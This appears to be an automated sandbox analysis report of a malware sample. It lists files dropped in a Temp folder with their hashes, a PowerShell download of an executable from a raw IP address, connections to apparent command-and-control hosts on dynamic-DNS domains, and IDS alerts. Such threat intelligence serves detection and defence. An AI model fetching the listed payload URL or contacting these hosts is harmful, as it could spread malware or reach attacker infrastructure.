SHA256: f719a2229c9929c53a9b10b59a2d1ac20b86758c0d360233e01942fa31e29409
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1RONFJ4LCO6QOWSVIXYO.temp
––
MD5:  ––
SHA256:  ––
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nek.mp3
text
MD5: 6d9b924a1abf1d14608bcb066ddfe976
SHA256: fb433941510461f34c27bc1625e9d1a249e59a58132eb7a79ae0acf2bd0bcae7
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nok.pdf
text
MD5: 1db14f74f3914de40c93043a5e0fd2b2
SHA256: 65ddd15ca974d5116f734ad62735fa5d25a298f46653433134ab9b509b3f37ea
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\sqj.dat
text
MD5: 42c1de8aafab368ba22a4c3504a35c19
SHA256: fca18198a5e5ce7a7438d9a0d5eabf81314f1b13eec4e7ab6b962cdcc60f3bf9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wnm.txt
text
MD5: 9d871b45be406860726b7127c3a443cf
SHA256: eb6bd3df86e186d00fdea3207eb712de268e2d8fcef9af8a9e8b73899f89957f
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wqh.ppt
text
MD5: 9c47a245493b6fdb09ebf389cbc97aa9
SHA256: b12245e281dbeb82ea9bd1574634a000ff06e26b14b377f82c820bd9f3af771a
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\pou.icm
text
MD5: 53ce9c11f69ede839689a93ea34b9201
SHA256: 3d08042dbb0a693dd4f838236e5d7f5e40f5667ba6b33adcd605f26610817627
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ois.xl
text
MD5: 153b3b542f9cd17247811f7af364a980
SHA256: 7357786d348f08ab1e564efb68cc740e416828252c732721b44bf5f8b9f78303
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\cll.ppt
text
MD5: c3038bb5d678596a20440872bb278380
SHA256: 70dcfc1d30a96aa81ca89c308a379a7458534b6c9cd469c8641e71842c188370
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tgo.ppt
text
MD5: da7da040fa0aac5f0434873dd878fd9c
SHA256: 57f6780fd5738439d4aa03b8f3aad8ceffaf99a2fb3e20b0e3916298ce09962a
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qtl.docx
text
MD5: eb59a1fe851e768f7bd175cc24217aac
SHA256: 7e30c168edd43afe3e0fb0d21485cf025d5f226d948cb4e56b9f722ba2281365
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lti.docx
text
MD5: 2571c4827b75254f512f67d569d4969e
SHA256: 72e1bf13d71df21ae55d248b6be66933e371cfc5bc7b0c33f4526f59e8f3f510
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wmg.mp4
text
MD5: 930e1630892a35d1cbd8a595e972eb0b
SHA256: 958e318f9c7d99abc90e5a98aee4f8af8205dcf542e28ebca2ed8ca6835f7577
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jvk.mp3
text
MD5: d9b7cc3f58da6d96c3dbfb4008b26eb9
SHA256: 29f324a7980e633b0052b5bdb634833cd094e5a631380fe6049fc6f6daa7a48c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\urr.docx
text
MD5: 1d37dace5d0be9a4c90b71036ffb43b0
SHA256: 040ed3cba92ec70663baecd5e7f4859776669f4405be70f6db3066bf984d16f4
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nbb.icm
text
MD5: 9b65c9d1111c7e0640ce5900f01dbf05
SHA256: f4b0ae209225a3321acd8b5303b09d8ba245aa4250620d1407356faf82e6f800
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bum.pdf
text
MD5: feaeea7208f7a411e4cdc0e3286a11db
SHA256: 1df03709f122f14e2606e94bccb74b47c6c48a483c68a45ed446c06c0ca01965
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dss.dat
text
MD5: c488c0eeaa4a77679f10a662945e5e4e
SHA256: db289b5f6cad00bf4b05ed3ba50825ac178119ea0d5f9f58f7a22f1ff670addf
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\seg=muu
text
MD5: 451111d03bca3331e4d1f2631f56c494
SHA256: 98ec9a9a42575a0626ebffaf344487e26118ebca0d837d218cfc4dc446f37102
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bje.ppt
text
MD5: f77626bd4356a4ae7252eccf68ee9f35
SHA256: 0e385f3f3122f4a5bfa9ddfe1214ef92ead6eea3c834540a88d19f5f23085958
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkq.docx
text
MD5: 51c9b23e003e3e14f4659bc60d4be131
SHA256: 3adc7f290017eb28aa34e8cec227e781e25d180c3eb77e03b01211369980e0b6
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4
text
MD5: 3576b5978b68394d98e25affd7225b83
SHA256: e182a17f5a6b486ff9410ecccbf9685bc5c54cf2ec314ae255040dabce04e895
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add71.TMP
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[2]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
2
TCP/UDP connections
18
DNS requests
17
Threats
15

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3036 powershell.exe GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe LT
executable
suspicious
–– –– GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe LT
executable
suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3036 powershell.exe 141.136.44.78:80 Vardas.lt, Uab LT suspicious
–– –– 141.136.44.78:80 Vardas.lt, Uab LT suspicious
–– –– 8.8.8.8:53 Google Inc. US whitelisted
–– –– 8.8.4.4:53 Google Inc. US whitelisted
–– –– 185.163.45.48:58887 MivoCloud SRL MD suspicious

DNS requests

Domain IP Reputation
kgentle777.hopto.org No response unknown
kgentle77.duckdns.org 185.163.45.48
malicious

Threats

PID Process Class Message
3036 powershell.exe A Network Trojan was detected ET INFO Executable Download from dotted-quad Host
3036 powershell.exe Potentially Bad Traffic ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3036 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3036 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3036 powershell.exe Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– A Network Trojan was detected ET INFO Executable Download from dotted-quad Host
–– –– Potentially Bad Traffic ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
–– –– Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
–– –– Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
–– –– Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain

Debug output strings

No debug info.